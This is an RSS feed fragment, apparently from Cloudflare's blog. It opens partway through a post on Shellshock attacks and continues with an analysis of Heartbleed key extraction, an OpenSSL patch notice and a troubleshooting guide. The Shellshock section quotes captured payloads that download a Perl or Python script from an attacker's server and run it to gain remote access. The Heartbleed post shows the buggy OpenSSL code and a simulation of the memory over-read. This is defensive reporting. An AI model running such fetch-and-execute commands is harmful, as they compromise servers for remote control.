            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/17Zh1JXPfZfNKPfYkhiRN2/14e516b8408634b4584df62e2153da3a/3894184210_47762c00a9_z.jpg" />
            
            </figure><p>(CC BY 2.0 <a href="https://www.flickr.com/photos/petercastleton/">peter castleton</a>)</p>
    <div>
      <h2>Taking Control</h2>
      <a href="#taking-control">
        
      </a>
    </div>
    <p>Around 8% of the attacks we've seen so far have been aimed at directly taking control of a server. Remote control attacks look like this:</p>
            <pre><code>() { :;}; /bin/bash -c \"cd /tmp;wget http://213.x.x.x/ji;curl -O /tmp/ji http://213.x.x.x/ji ; perl /tmp/ji;rm -rf /tmp/ji\"</code></pre>
            <p>This command tries to use two programs (<code>wget</code> and <code>curl</code>) to download a program from a server that the attacker controls. The program is written in the Perl language, and once downloaded it is immediately run. This program sets up remote access for an attacker to the vulnerable web server.</p><p>Another attack uses the Python language to set up a program that can be used to remotely run any command on the vulnerable machine:</p>
            <pre><code>() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://xxxxxxxxxxxxxxx.com/cl.py &gt; /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update &gt; /dev/null&amp; sleep 5; rm -rf /tmp/clamd_update\"</code></pre>
            <p>The <code>cl.py</code> program downloaded is made to look like an update to the ClamAV antivirus program. After a delay of 5 seconds, the attack cleans up after itself by removing the downloaded file (leaving it running only in memory).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ikGFv90UzO7oo38QMIywN/b36ee7e1656b75b73172cdfd5c19ab0b/6933311011_3b385e28c8_o.jpg" />
            
            </figure><p>(CC BY 2.0 <a href="https://www.flickr.com/photos/custom-painting-studio/">Jeff Taylor</a>)</p>
    <div>
      <h2>Target Selection</h2>
      <a href="#target-selection">
        
      </a>
    </div>
    <p>Looking at the web sites being attacked, and the URLs being requested, it's possible to make an educated guess at the specific web applications being attacked.</p><p>The top URLs we've seen attacked are: / (23.00%), /cgi-bin-sdb/printenv (15.12%), /cgi-mod/index.cgi (14.93%), /cgi-sys/entropysearch.cgi (15.20%) and /cgi-sys/defaultwebpage.cgi (14.59%). Some of these URLs are used by popular web applications and even a hardware appliance.</p><p>It appears that 23% of the attacks are directed against the <a href="http://cpanel.net/">cPanel</a> web hosting control software, 15% against old Apache installations, and 15% against the <a href="https://www.barracuda.com/">Barracuda</a> hardware products which have a web-based interface.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/486boXqbgwzEOIjozq8rKI/8ba80c35b52a63122d1bcf134d3932a2/cpanel.png" />
            
            </figure><p>The latter is interesting because it highlights the fact that Shellshock isn't just an attack on web sites: it's an attack on anything that's running bash and accessible across the Internet. That could include hardware devices, set-top boxes, laptop computers, even, perhaps, telephones.</p> ]]></content:encoded>
            <category><![CDATA[Attacks]]></category>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <guid isPermaLink="false">2FQCkimRP34AHgsqSMgBLa</guid>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
        <item>
            <title><![CDATA[Answering the Critical Question: Can You Get Private SSL Keys Using Heartbleed?]]></title>
            <link>https://blog.cloudflare.com/answering-the-critical-question-can-you-get-private-ssl-keys-using-heartbleed/</link>
            <pubDate>Fri, 11 Apr 2014 02:27:00 GMT</pubDate>
            <description><![CDATA[ Below is what we thought as of 12:27pm UTC. To verify our belief we crowd sourced the investigation. It turns out we were wrong. While it takes effort, it is possible to extract private SSL keys. ]]></description>
            <content:encoded><![CDATA[ <p></p>
    <div>
      <h3>Update:</h3>
      <a href="#update">
        
      </a>
    </div>
    <p><i>Below is what we thought as of 12:27pm UTC. To verify our belief we crowd-sourced the investigation. It turns out we were wrong. While it takes effort, it is possible to extract private SSL keys. The challenge was solved by Software Engineer </i><a href="https://twitter.com/indutny"><i>Fedor Indutny</i></a><i> and Ilkka Mattila at NCSC-FI roughly 9 hours after the challenge was first published. Fedor sent 2.5 million requests over the course of the day and Ilkka sent around 100K requests. Our recommendation based on this finding is that everyone reissue and revoke their private keys. CloudFlare has accelerated this effort on behalf of the customers whose SSL keys we manage. </i><a href="/the-results-of-the-cloudflare-challenge"><i>You can read more here</i></a><i>.</i></p><p>The widely-used open source library OpenSSL revealed on Monday it had a major bug, now known as “Heartbleed”. By sending a specially crafted packet to a vulnerable server running an unpatched version of OpenSSL, an attacker can get up to 64kB of the server’s working memory. This is the result of a classic implementation bug known as a <a href="https://www.owasp.org/index.php/Buffer_over-read">buffer over-read</a>.</p><p>There has been speculation that this <a href="https://www.cloudflare.com/the-net/oss-attack-detection/">vulnerability</a> could expose server certificate private keys, making those sites vulnerable to impersonation. This would be the disaster scenario, requiring virtually every service to reissue and revoke its <a href="https://www.cloudflare.com/application-services/products/ssl/">SSL certificates</a>. Note that simply reissuing certificates is not enough; you must revoke them as well.</p><p>Unfortunately, the certificate revocation process is <a href="http://news.netcraft.com/archives/2013/05/13/how-certificate-revocation-doesnt-work-in-practice.html">far from perfect</a> and was never built for revocation at mass scale.
If every site revoked its certificates, it would impose a significant burden and performance penalty on the Internet. At CloudFlare scale the reissuance and revocation process could break the CA infrastructure. So, we’ve spent a significant amount of time talking to our CA partners in order to ensure that we can safely and successfully revoke and reissue our customers' certificates.</p><p>While the vulnerability seems likely to put private key data at risk, to date there have been no verified reports of actual private keys being exposed. At CloudFlare, we received early warning of the Heartbleed vulnerability and patched our systems 12 days ago. We’ve spent much of the time running extensive tests to figure out what can be exposed via Heartbleed and, specifically, to understand if private SSL key data was at risk.</p><p>Here’s the good news: after extensive testing on our software stack, we have been unable to successfully use Heartbleed on a vulnerable server to retrieve any private key data. Note that is not the same as saying it is impossible to use Heartbleed to get private keys. We do not yet feel comfortable saying that. However, if it is possible, it is at a minimum very hard. And, we have reason to believe based on the data structures used by OpenSSL and the modified version of NGINX that we use, that it may in fact be impossible.</p><p>To get more eyes on the problem, we have created a site so the world can challenge this hypothesis:</p><p><a href="https://www.cloudflarechallenge.com/heartbleed"><b>CloudFlare Challenge: Heartbleed</b></a></p><p>This site was created by CloudFlare engineers to be intentionally vulnerable to heartbleed. It is not running behind CloudFlare’s network. We encourage everyone to attempt to get the private key from this website. 
If someone is able to steal the private key from this site using heartbleed, we will post the full details here.</p><p>While we believe it is unlikely that private key data was exposed, we are proceeding with an abundance of caution. We’ve begun the process of reissuing and revoking the keys CloudFlare manages on behalf of our customers. In order to ensure that we don’t overburden the certificate authority resources, we are staging this process. We expect that it will be complete by early next week.</p><p>In the meantime, we’re hopeful we can get more assurance that SSL keys are safe through our crowd-sourced effort to hack them. To get everyone started, we wanted to outline the process we’ve embarked on to date in order to attempt to hack them.</p>
    <div>
      <h3>The bug</h3>
      <a href="#the-bug">
        
      </a>
    </div>
    <p>A heartbeat is a message that is sent to the server just so the server can send it back. This lets a client know that the server is still connected and listening. The heartbleed bug was a mistake in the implementation of the response to a heartbeat message.</p><p>Here is the offending code:</p>
            <pre><code>p = &amp;s-&gt;s3-&gt;rrec.data[0];

[...]

hbtype = *p++;
n2s(p, payload);
pl = p;

[...]

buffer = OPENSSL_malloc(1 + 2 + payload + padding);
bp = buffer;

[...]

memcpy(bp, pl, payload);</code></pre>
            <p>The incoming message is stored in a structure called <code>rrec</code>, which contains the incoming request data. The code reads the type (finding out that it's a heartbeat) from the first byte, then reads the next two bytes which indicate the length of the heartbeat payload. In a valid heartbeat request, this length matches the length of the payload sent in the heartbeat request.</p><p>The major problem (and cause of heartbleed) is that the code does not check that this length is the actual length sent in the heartbeat request, allowing the request to ask for more data than it should be able to retrieve. The code then copies the amount of data indicated by the length from the incoming message to the outgoing message. If the length is longer than the incoming message, the software just keeps copying data past the end of the message. Since the length variable is 16 bits, you can request up to 65,535 bytes from memory. The data that lives past the end of the incoming message is from a kind of no-man’s land that the program should not be accessing and may contain data left behind from other parts of OpenSSL.</p>
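<p>The bug and its fix can be modelled in a few lines. This is a simulation, not OpenSSL's actual code: a single byte string stands in for the heap, with leftover data from earlier allocations sitting just past the incoming request:</p>

```python
# Simulation of the Heartbleed over-read; not OpenSSL's real code.
# "LEFTOVER" models whatever happened to be adjacent on the heap.
LEFTOVER = b"session=secret-cookie; password=hunter2"

def heartbeat_response(request, patched):
    # Byte 0 is the type; bytes 1-2 are the claimed payload length
    # (what n2s() reads); the rest is the actual payload.
    claimed_len = int.from_bytes(request[1:3], "big")
    actual_payload = request[3:]
    if patched and claimed_len > len(actual_payload):
        return None  # the fix: discard requests that lie about their length
    memory = request + LEFTOVER  # the request plus neighbouring heap data
    # The buggy memcpy: copy claimed_len bytes starting at the payload,
    # running past the end of the request into adjacent memory.
    return memory[3:3 + claimed_len]

# A heartbeat carrying 4 bytes of payload but claiming 60.
req = b"\x01" + (60).to_bytes(2, "big") + b"ping"

print(heartbeat_response(req, patched=False))  # leaks the leftover secrets
print(heartbeat_response(req, patched=True))   # None
```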
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2cb01fhCapiWLF2XGkA8PE/b6d8d9ce2c3b9f685a700ff50e775799/blog-illustration-heartbleed.png" />
            
            </figure><p>When processing a request that contains a longer length than the request payload, some of this unknown data is copied into the response and sent back to the client. This extra data can contain sensitive information like session cookies and passwords, as we describe in the next section.</p><p>The fix for this bug is simple: check that the length of the message actually matches the length of the incoming request. If it is too long, return nothing. That’s exactly what the OpenSSL patch does.</p>
    <div>
      <h3>Malloc and the Heap</h3>
      <a href="#malloc-and-the-heap">
        
      </a>
    </div>
    <p>So what sort of data can live past the end of the request? The technical answer is “heap data,” but the more realistic answer is that it’s platform dependent.</p><p>On most computer systems, each process has its own set of working memory. Typically this is split into two data structures: the stack and the heap. This is the case on Linux, the operating system that CloudFlare runs on its servers.</p><p>The memory address with the highest value is where the stack data lives. This includes local working variables and non-persistent data storage for running a program. The lowest portion of the address space typically contains the program’s code, followed by static data needed by the program. Right above that is the heap, where all dynamically allocated data lives.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6HWKap7AiqX5LqnPsONfIl/965c80d25eecde1ac67c6f761331f819/image00.gif" />
            
            </figure><p>Managing data on the heap is done with the library calls <code>malloc</code> (used to get memory) and <code>free</code> (used to give it back when no longer needed). When you call <code>malloc</code>, the program picks some unused space in the heap area and returns the address of the first part of it to you. Your program is then able to store data at that location. When you call <code>free</code>, the memory space is marked as unused. In most cases, the data that was stored in that space is just left there unmodified.</p><p>Every new allocation needs some unused space from the heap. Typically this is chosen to be at the lowest possible address that has enough room for the new allocation. A heap typically grows upwards; later allocations get higher addresses. If a block of data is allocated early it gets a low address, and later allocations will get higher addresses, unless a big early block is freed.</p><p>This is of direct relevance because both the incoming message request (<code>s-&gt;s3-&gt;rrec.data</code>) and the certificate private key are allocated on the heap with <code>malloc</code>. The exploit reads data from the address of the incoming message. For previous requests that were allocated and freed, their data (including passwords and cookies) may still be in memory. If they are stored less than 65,536 bytes higher in the address space than the current request, the details can be revealed to an attacker.</p><p>Requests come and go, recycling memory at around the top of the heap. This makes extracting previous request data from this attack very likely. This is important in understanding what you can and cannot get at using the vulnerability. Previous requests could contain password data, cookies or other exploitable data. Private keys are a different story, due to the way the heap is structured. The good news is this means that it is much less likely private SSL keys would be exposed.</p>
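<p>The layout argument can be illustrated with a toy allocator in which the heap grows upward, as described above: the private key is allocated at startup and gets the lowest address, every later request sits above it, and the exploit only reads upward from a request. (This is a deliberately simplified model, not real malloc behaviour.)</p>

```python
# Toy bump allocator: the heap grows upward, so earlier allocations
# get lower addresses. A deliberate simplification of real malloc,
# used only to illustrate the layout argument above.
heap = {}
next_addr = 0

def malloc(size, label):
    global next_addr
    addr = next_addr
    heap[addr] = (size, label)
    next_addr += size
    return addr

key_addr = malloc(4096, "private key")   # loaded at startup: lowest address
request_addrs = [malloc(16384, f"request {i}") for i in range(1000)]

# Heartbleed reads upward from a request's address, so only data at
# higher addresses can leak. The key sits below every request.
print(all(addr > key_addr for addr in request_addrs))  # True
```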
    <div>
      <h3>Read up, not down</h3>
      <a href="#read-up-not-down">
        
      </a>
    </div>
    <p>In NGINX, the keys are loaded immediately when the process is started, which puts the keys very low in the memory space. This makes it unlikely that incoming requests will be allocated with a lower address space. We tested this experimentally.</p><p>We modified our test version of NGINX to print out the location in memory of each request (<code>s-&gt;s3-&gt;rrec.data</code>), whenever there was an incoming heartbeat. We compared this to the location in memory where the private key is stored and found that we could never get a request to be at a lower address than our private keys regardless of the number of requests we sent. Since the exploit only reads higher addresses, it could not be used to obtain private keys.</p><p>Here is a video of what searching for private keys looks like:</p><p>If NGINX is reloaded, it starts a new process and loads the keys right away, putting them at a low address. Getting a request to be allocated even lower in the memory space than the early-loaded keys is very unlikely.</p><p>We not only checked the location of the private keys, we wrote a tool to repeatedly extract extra data and write the results to file for analysis. We searched through gigabytes of these responses for private key information but did not find any. The most interesting things we found related to certificates were the occasional copy of the public certificate (from a previous output buffer) and some NGINX configuration data. 
However, the private keys were nowhere to be found.</p><p>To get an idea of what is happening inside the heap used by OpenSSL inside NGINX we wrote another tool to create a graphic showing the location of private keys (red pixels), memory that has never been used (black), memory that has been used but is now sitting idle because of a call to free (blue), and memory that is in use (green).</p><p>This picture shows the state of the heap memory (from left to right) immediately after NGINX has loaded and has yet to serve a request, after a single request, after two requests and after millions of requests. As described above, the critical thing to note is that when the first request is made, new memory is allocated far beyond the place where the private key is stored. Each 2x2 pixel square represents a single byte of memory; each row is 256 bytes.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4kyjDrvwVyh42FxEm4R0jg/3efd8109ad24e6113734dc280855fa56/Screen_Shot_2014-04-11_at_12.45.44_1.png" />
            
            </figure><p>Eagle-eyed readers will have noticed a block of memory that was allocated at a lower memory location than the private key. That's true. We looked into it and it is not being used to store the heartbleed (or other) TLS packet data. And it is much more than 64k away from the private key.</p>
    <div>
      <h3>What can you get?</h3>
      <a href="#what-can-you-get">
        
      </a>
    </div>
    <p>We said above that it's possible to get sensitive data from HTTP and TLS requests that the server has handled, even if the private key looks inaccessible.</p><p>Here, for example, is a dump showing some HTTP headers from a previous request to a running NGINX server. These headers would have been transmitted securely over HTTPS but Heartbleed means that an attacker can read them. That’s a big problem because the headers might contain login credentials or a cookie.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2GZ7K9jJ6nAKaFzBvmyZuZ/edbac730a324c4983d126938136887a8/image04_3.png" />
            
            </figure><p>And here’s a copy of the public part of a certificate (as would be sent as part of the TLS/SSL handshake) sitting in memory and readable. Since it’s public this is not in itself dangerous -- by design, you can get the public key of a website even without the vulnerability and doing so does not create risk due to the nature of public/private key cryptography.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4ldHLent9feNqC46j7fgYH/fa83d90b96c4a065ed69ad3f5d912e18/image03_3.png" />
            
            </figure><p>We have not fully ruled out the possibility, albeit slim, that some early elements of the heap get reused when NGINX is restarted. In theory, the old memory of the previous process might be available to a newly restarted NGINX. However, after extensive testing, we have not been able to reproduce this situation with an NGINX server on Linux. If a private key is available, it is most likely only available on the first request after restart. After that, the chance that the memory is still available is extremely low.</p><p>There have been <a href="https://twitter.com/kennwhite/status/453944475459805184">reports of a private key being stolen</a> from Apache servers, but only on the first request. This fits with our hypothesis that restarting a server may cause the key to be revealed briefly. Apache also creates some special data structures in order to load private keys that are encrypted with a passphrase, which may make it more likely for private keys to appear in the vulnerable portion of the heap.</p><p>At CloudFlare we do not restart our NGINX instances very often, so the likelihood that an attacker hit our server with this exploit on the first request after a restart is extremely low. Even if they did, the likelihood of seeing private key material on that request is very low. Moreover, NGINX, which is what CloudFlare’s system is based on, does not create the same special structures for HTTPS processing, making it less likely keys would ever appear in a vulnerable portion of the heap.</p>
    <div>
      <h3>Conclusions</h3>
      <a href="#conclusions">
        
      </a>
    </div>
    <p>We think that stealing private keys from most NGINX servers is at least extremely hard and, likely, impossible. Even with Apache, which we think may be slightly more vulnerable and which we do not use at CloudFlare, we believe the likelihood of private SSL keys being revealed through the Heartbleed vulnerability is very low. That’s about the only good news of the last week.</p><p>We want others to test our results, so we created the <a href="https://www.cloudflarechallenge.com/heartbleed">Heartbleed Challenge</a>. Aristotle struggled with the problem of disproving the existence of something that doesn’t exist. You can’t prove a negative, so through experimental results we will never be absolutely sure there’s not a condition we haven’t tested. However, the more eyes we get on the problem, the more confident we will be that, in spite of a number of other ways the Heartbleed vulnerability was extremely bad, we may have gotten lucky and been spared the worst of the potential consequences.</p><p>That said, we’re proceeding assuming the worst. With respect to private keys held by CloudFlare, we patched the vulnerability before the public had knowledge of it, making it unlikely that attackers were able to obtain private keys. Still, to be safe, as outlined at the beginning of this post, we are executing a plan to reissue and revoke potentially affected certificates, including the cloudflare.com certificate.</p><p>Vulnerabilities like this one are challenging because people have imperfect information about the risks they pose. It is important that the community works together to identify the real risks and work towards a safer Internet. We’ll monitor the results of the Heartbleed Challenge and immediately publicize any results that challenge the conclusions above. I will be giving a webinar about this topic next week with updates.</p><p>You can register for that <a href="https://cc.readytalk.com/r/it1914v5pbc0&amp;eom">here</a>.</p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[SSL]]></category>
            <category><![CDATA[OpenSSL]]></category>
            <category><![CDATA[Reliability]]></category>
            <guid isPermaLink="false">7CRHqE4p5vmUjnwj1ujrbO</guid>
            <dc:creator>Nick Sullivan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Staying ahead of OpenSSL vulnerabilities]]></title>
            <link>https://blog.cloudflare.com/staying-ahead-of-openssl-vulnerabilities/</link>
            <pubDate>Mon, 07 Apr 2014 09:00:00 GMT</pubDate>
            <description><![CDATA[ Today a new vulnerability was announced in OpenSSL 1.0.1 that allows an attacker to reveal up to 64kB of memory to a connected client or server (CVE-2014-0160). We fixed this vulnerability last week before it was made public.  ]]></description>
            <content:encoded><![CDATA[ <p>Today a new vulnerability was announced in OpenSSL 1.0.1 that allows an attacker to reveal up to 64kB of memory to a connected client or server (<a href="http://www.openssl.org/news/vulnerabilities.html#2014-0160">CVE-2014-0160</a>). We fixed this vulnerability last week before it was made public. All sites that use CloudFlare for SSL have received this fix and are automatically protected.</p><p>OpenSSL is the core cryptographic library CloudFlare uses for SSL/TLS connections. If your site is on CloudFlare, every connection made to the HTTPS version of your site goes through this library. As one of the largest deployments of OpenSSL on the Internet today, CloudFlare has a responsibility to be vigilant about fixing these types of bugs before they go public and attackers start exploiting them and putting our customers at risk.</p><p>We encourage everyone else running a server that uses OpenSSL to upgrade to version 1.0.1g to be protected from this vulnerability. For previous versions of OpenSSL, re-compiling with the OPENSSL_NO_HEARTBEATS flag enabled will protect against this vulnerability. OpenSSL 1.0.2 will be fixed in 1.0.2-beta2.</p><p>This bug fix is a successful example of what is called responsible disclosure. Instead of disclosing the vulnerability to the public right away, the people notified of the problem tracked down the appropriate stakeholders and gave them a chance to fix the vulnerability before it went public. This model helps keep the Internet safe. A big thank you goes out to our partners for disclosing this vulnerability to us in a safe, transparent, and responsible manner. We will announce more about our responsible disclosure policy shortly.</p><p>Just another friendly reminder that CloudFlare is on top of things and making sure your sites stay as safe as possible.</p> ]]></content:encoded>
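The mechanics of the leak are simple to sketch. Below is an illustrative Python reconstruction of the malformed heartbeat message behind CVE-2014-0160, following the RFC 6520 field layout (the record framing is simplified, and `heartbleed_probe` is a name invented here for illustration, not OpenSSL's or CloudFlare's code):

```python
import struct

def heartbleed_probe(claimed_length=0xFFFF, payload=b""):
    # HeartbeatMessage (RFC 6520): type (1 = heartbeat_request),
    # payload_length, then the payload itself. The bug: vulnerable OpenSSL
    # echoed back `claimed_length` bytes without checking that the payload
    # actually contained that many, leaking up to ~64 kB of adjacent
    # process memory per request.
    msg = struct.pack(">BH", 1, claimed_length) + payload

    # TLS record header: content type 24 (heartbeat), version TLS 1.1
    # (0x0302), and the length of the record body.
    return struct.pack(">BHH", 24, 0x0302, len(msg)) + msg

# A probe claiming 0xFFFF (65,535) payload bytes while sending none:
probe = heartbleed_probe()
```

Since payload_length is a 16-bit field, a single request can claim at most 0xFFFF bytes, which is where the "up to 64kB" figure comes from.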
            <category><![CDATA[TLS]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[OpenSSL]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[SSL]]></category>
            <guid isPermaLink="false">1DeIj3hZtGDLAbL3EpBkp4</guid>
            <dc:creator>Nick Sullivan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare Tips: Troubleshooting Common Problems]]></title>
            <link>https://blog.cloudflare.com/cloudflare-tips-troubleshooting-common-problems/</link>
            <pubDate>Fri, 18 Nov 2011 23:08:00 GMT</pubDate>
            <description><![CDATA[ Debugging technical issues online can be tricky. There are many moving pieces; it can be an isolated network connection with the ISP, an issue with your server or one of CloudFlare's data centers could be temporarily having a problem. ]]></description>
            <content:encoded><![CDATA[ <p>Debugging technical issues online can be tricky. There are many moving pieces: it could be an isolated network issue with an ISP, a problem with your server, or a temporary problem at one of <a href="https://www.cloudflare.com/features-cdn">Cloudflare's data centers</a>. We wanted to share some tips on how to troubleshoot website issues and provide some good techniques to prevent site issues in the future.</p>
    <div>
      <h4>Website is Unavailable</h4>
      <a href="#website-is-unavailable">
        
      </a>
    </div>
    <p>If you can't get to your website and you see a cached copy of your website or a "<a href="https://support.cloudflare.com/entries/22036452-my-website-is-offline-or-unavailable">Your Website is Unavailable</a>" error page, the first thing to do is to check if your server is having issues.</p>
    <div>
      <h4>How to quickly test if your server is having issues</h4>
      <a href="#how-to-quickly-test-if-your-server-is-having-issues">
        
      </a>
    </div>
    <p><i>For Mac users:</i> Open the Terminal application on your Mac and run the following curl command to see if your server is responding:</p><p>curl -v -A firefox/4.0 -H 'Host: yourdomain.com' YourServerIP</p><p>--&gt; YourServerIP: you can get the IP of your origin server from the DNS Settings page in your Cloudflare account. It will look something like 192.73.146.94</p><ul><li><p><a href="http://curl.haxx.se/">curl for Windows</a></p></li><li><p><a href="https://help.ubuntu.com/community/UsingTheTerminal">curl for Linux</a></p></li></ul><p>When you press enter, you'll get an output message.</p><p>If you get an error message like "can't connect to host" or a "500 internal server error" response, your server is not responding properly. You should contact your hosting provider and work with them to resolve the server issue.</p><p>If you get HTML back but still see a site offline or unavailable message from Cloudflare, then connections from <a href="https://www.cloudflare.com/ips">Cloudflare's IPs</a> are being restricted or blocked at either the hosting provider or server level. Please make sure that the Cloudflare IP addresses are allowlisted on your server and with your host.</p>
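The same origin check can also be scripted. Here is a hedged Python equivalent of the curl command above; `check_origin` and `origin_probe_request` are names invented for this sketch, and the IP and hostname are placeholders you would replace with your own values:

```python
import socket

def origin_probe_request(host, path="/"):
    # Build the raw HTTP/1.1 request, equivalent to:
    #   curl -v -A firefox/4.0 -H 'Host: yourdomain.com' YourServerIP
    return ("GET {} HTTP/1.1\r\n"
            "Host: {}\r\n"
            "User-Agent: firefox/4.0\r\n"
            "Connection: close\r\n\r\n").format(path, host).encode()

def check_origin(origin_ip, host, port=80, timeout=10):
    # Connect straight to the origin IP (bypassing Cloudflare) and return
    # the HTTP status line the server answers with.
    with socket.create_connection((origin_ip, port), timeout=timeout) as s:
        s.sendall(origin_probe_request(host))
        return s.recv(4096).split(b"\r\n", 1)[0].decode()

# Example with placeholder values (not run here):
#   check_origin("192.73.146.94", "yourdomain.com")
```

If the call raises a connection error or returns a 5xx status line, work with your hosting provider; if it returns HTML while Cloudflare still shows the site as offline, check that Cloudflare's IPs are allowlisted.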
    <div>
      <h4>If you can't access cPanel or use FTP</h4>
      <a href="#if-you-cant-access-cpanel-or-useftp">
        
      </a>
    </div>
    <p>Cloudflare acts as a reverse proxy. As a result, you can still access cPanel or use FTP, but you will have to do so a little differently. To access cPanel or FTP:</p><ul><li><p><a href="https://support.cloudflare.com/entries/22047603-how-do-i-use-cpanel-with-cloudflare">Accessing cPanel with Cloudflare</a></p></li><li><p><a href="https://support.cloudflare.com/entries/22036662-will-re-routing-through-cloudflare-affect-my-use-of-ftp-uploading">Using FTP with Cloudflare</a></p></li></ul>
    <div>
      <h4>Certain scripts on my website (like ads or social plugins) are breaking or not working</h4>
      <a href="#certain-scripts-on-my-website-like-ads-or-social-plugins-are-breaking-or-not-working">
        
      </a>
    </div>
    <p>Cloudflare has two beta features that speed up the loading of your web pages, but they can sometimes cause issues.</p><p><i><b><a href="/56590463">Rocket Loader</a></b></i> can potentially impact JavaScript calls on your site, including anything that uses jQuery. For example, if you see an ad widget breaking, it is possible that Rocket Loader is breaking its JavaScript, and you should turn the feature off from your Cloudflare Settings page.</p><p>If you want to keep Rocket Loader turned on for the performance boost, you can configure the service to <a href="https://support.cloudflare.com/entries/22063443-how-can-i-have-rocket-loader-ignore-my-script-s-in-automatic-mode">ignore certain scripts</a> on your site.</p><p>Note: Rocket Loader is off by default upon signup. Once you turn it on or off, the change takes less than 3 minutes to take effect.</p><p><i><b><a href="/an-all-new-and-improved-autominify">Auto Minify</a></b></i> rarely causes issues with CSS and JavaScript on its own. However, it can sometimes cause problems if you already have another minification service turned on. We recommend having only one minify option turned on for your website.</p>
    <div>
      <h4>The changes I made to my website aren't appearing:</h4>
      <a href="#the-changes-i-made-to-my-website-arent-appearing">
        
      </a>
    </div>
    <p>If you're making changes to the <a href="https://support.cloudflare.com/entries/22037282-what-file-extensions-does-cloudflare-cache-for-static-content">static content Cloudflare caches</a> on your site, including changes to JavaScript, CSS or images, it is easy to forget that you need to turn on Cloudflare Development Mode to bypass our cache so these changes appear immediately. If you forgot to turn on Development Mode before making the changes, you can always purge your Cloudflare cache to make them appear right away. Just a reminder: purging the cache for your website will have a performance impact for a couple of hours.</p>
    <div>
      <h4>Preventing site issues while on Cloudflare</h4>
      <a href="#preventing-site-issues-while-on-cloudflare">
        
      </a>
    </div>
    <p>The most important step you can take is to make sure that your server or hosting provider has the Cloudflare IP ranges allowlisted. If any attempts to connect to your site are blocked or limited in any way, this could create connectivity issues for some of your visitors. Another very important step is to install <a href="https://www.cloudflare.com/resources-downloads">mod_cloudflare</a> (an Apache module) on your server. mod_cloudflare restores the original visitor IP to your server logs, and is also a good way to reduce the probability that your hosting provider will limit connections from Cloudflare's IPs. If you are not using Apache, we have a list of solutions for <a href="https://support.cloudflare.com/entries/22051973-does-cloudflare-have-an-ip-module-for-nginx">nginx</a>, <a href="https://support.cloudflare.com/entries/22054997-how-do-i-restore-original-visitor-ip-with-windows-iis">Windows</a> and others in the <a href="https://support.cloudflare.com/forums/21318827-how-do-i-restore-original-visitor-ip-to-my-server-logs">Cloudflare Support Forums</a>.</p>
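Conceptually, restoring the visitor IP is a one-liner: Cloudflare adds a CF-Connecting-IP header to each proxied request carrying the original visitor's address. The sketch below shows the idea as a tiny WSGI helper (a simplified stand-in for mod_cloudflare, not its actual code); in production, only trust the header on connections that really come from Cloudflare's published IP ranges:

```python
def real_client_ip(environ):
    # Behind Cloudflare, REMOTE_ADDR is one of Cloudflare's proxy IPs; the
    # original visitor's address travels in the CF-Connecting-IP header
    # (HTTP_CF_CONNECTING_IP in WSGI's environ). Prefer it when present.
    return environ.get("HTTP_CF_CONNECTING_IP") or environ.get("REMOTE_ADDR")
```

The same lookup works in any framework that exposes request headers; only the spelling of the header key changes.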
    <div>
      <h4>Cloudflare is Having an Issue</h4>
      <a href="#cloudflare-is-having-an-issue">
        
      </a>
    </div>
    <p>Cloudflare runs 14 data centers around the world. Sometimes issues arise at one of our data centers, and we deal with these quickly (on average, in less than 10 minutes). Only visitors in that geographic region are affected.</p><ul><li><p>We make all announcements on <a href="https://twitter.com/#!/CloudflareSys">Cloudflare's System Status</a> Twitter handle.</p></li><li><p>If you do not use Twitter, you can also follow updates on the Cloudflare system status <a href="https://www.cloudflare.com/system-status">page</a>.</p></li></ul>
    <div>
      <h4>If you get a report from one of your visitors that they can not connect to your website:</h4>
      <a href="#if-you-get-a-report-from-one-of-your-visitors-that-they-can-not-connect-to-your-website">
        
      </a>
    </div>
    <ol><li><p>Check to make sure your server is online (see the instructions on how to do this above).</p></li><li><p>If your server is online, make sure Cloudflare's IPs are not being blocked.</p></li><li><p>If your server is online and Cloudflare's IPs are not being blocked, <a href="http://support.cloudflare.com/">send us a report here</a>. In your email, include: i) your website; ii) where the visitor is geographically located (issues are almost always isolated to one of our data centers, so knowing where they are lets us investigate much more quickly); iii) a description of the error page they are seeing; iv) the output of a traceroute (if possible).</p></li><li><p>Temporarily deactivate Cloudflare for your website by choosing 'Deactivate' from your Cloudflare control panel. Deactivating means that Cloudflare will continue to resolve DNS for your website, but none of your traffic will pass through our performance and security network. If it is a Cloudflare issue, this will immediately resolve the problem and our team can investigate the report. Once we've identified what is wrong, you can easily reactivate Cloudflare. Note: you do not need to change your name servers.</p></li></ol><p>I hope these tips help you troubleshoot some of the common issues users have on Cloudflare. Please let us know if there are any other areas of confusion that we can address in either our <a href="http://support.cloudflare.com">help section</a> or in another Cloudflare blog post.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Ninjas]]></category>
            <category><![CDATA[Best Practices]]></category>
            <guid isPermaLink="false">69yzbPpETs3q0jGVvaHKM3</guid>
            <dc:creator>Damon Billian</dc:creator>
        </item>
    </channel>
</rss>